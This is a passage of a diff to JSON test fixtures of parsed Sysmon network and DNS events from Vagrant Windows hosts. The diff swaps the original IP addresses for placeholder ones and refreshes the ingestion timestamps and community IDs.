Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8720,15 +8629,15 @@ }, "destination": { "port": 137, - "ip": "169.254.180.25" + "ip": "89.160.20.156" }, "source": { "port": 137, - "ip": "169.254.255.255" + "ip": "89.160.20.156" }, "network": { "protocol": "netbios-ns", - "community_id": "1:yP71IXofOTWmF1LG760//yXa4Rk=", + "community_id": "1:fbQ9BbXiy01VWluiIQp2GM9FUAU=", "transport": "udp", "type": "ipv4", "direction": "ingress" @@ -8742,14 +8651,13 @@ "SYSTEM" ], "ip": [ - "169.254.255.255", - "169.254.180.25" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741684400Z", + "ingested": "2021-12-09T13:50:23.457054Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8826,7 +8734,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741690900Z", + "ingested": "2021-12-09T13:50:23.457059800Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e18\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003efe80:0:0:0:616f:32fa:b04f:b419\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003eff02:0:0:0:0:0:1:3\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8878,15 +8786,15 @@ }, "destination": { "port": 5355, - "ip": "e000:fc:0:0:0:0:0:0" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "port": 55717, - "ip": "a9fe:b419:0:0:f880:2301:e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "network": { "protocol": "llmnr", - "community_id": "1:SHkoHfPFDYWai8qQBwIiRxvCPZw=", + "community_id": "1:CbJTXAoYGQFCeKHghMVMZBaSXX0=", "transport": "udp", "type": "ipv6", "direction": "egress" @@ -8900,14 +8808,13 @@ "NETWORK SERVICE" ], "ip": [ - "a9fe:b419:0:0:f880:2301:e0:ffff", - "e000:fc:0:0:0:0:0:0" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741696500Z", + "ingested": "2021-12-09T13:50:23.457065600Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea9fe:b419:0:0:f880:2301:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:0:0:0:0:0:0\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8956,7 +8863,7 @@ }, "destination": { "port": 137, - "ip": "40.77.226.250" + "ip": "89.160.20.156" }, "source": { "port": 137, @@ -8965,7 +8872,7 @@ }, "network": { "protocol": "netbios-ns", - "community_id": "1:DI+g4BImhWaUwPmLEjdMMQVYPLs=", + "community_id": "1:W+rKY9g2gw/4oKxs1Chg32lzBig=", "transport": "udp", "type": "ipv4", "direction": "egress" @@ -8980,16 +8887,16 @@ ], "ip": [ "10.0.2.15", - "40.77.226.250" + "89.160.20.156" ] }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:23:14.741703800Z", + "ingested": "2021-12-09T13:50:23.457071500Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -9069,7 +8976,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:23:14.741712900Z", + "ingested": "2021-12-09T13:50:23.457077300Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e21\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.276\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.3\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -9120,7 +9027,7 @@ }, "destination": { "port": 137, - "ip": "169.254.255.255" + "ip": "89.160.20.156" }, "source": { "port": 137, @@ -9129,7 +9036,7 @@ }, "network": { "protocol": "netbios-ns", - "community_id": "1:ZHyFuF2PjubLSbAh4zRQIZHOZK8=", + "community_id": "1:W+rKY9g2gw/4oKxs1Chg32lzBig=", "transport": "udp", "type": "ipv4", "direction": "egress" @@ -9144,13 +9051,13 @@ ], "ip": [ "10.0.2.15", - "169.254.255.255" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741719600Z", + "ingested": "2021-12-09T13:50:23.457083100Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:50.357Z", @@ -9216,27 +9123,27 @@ "type": "CNAME" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.66.2", - "151.101.130.2", - "151.101.194.2", - "151.101.2.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -9252,16 +9159,13 @@ "api-s2s.taboola.com" ], "ip": [ - "151.101.66.2", - "151.101.130.2", - "151.101.194.2", - "151.101.2.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741724600Z", + "ingested": "2021-12-09T13:50:23.457089Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData 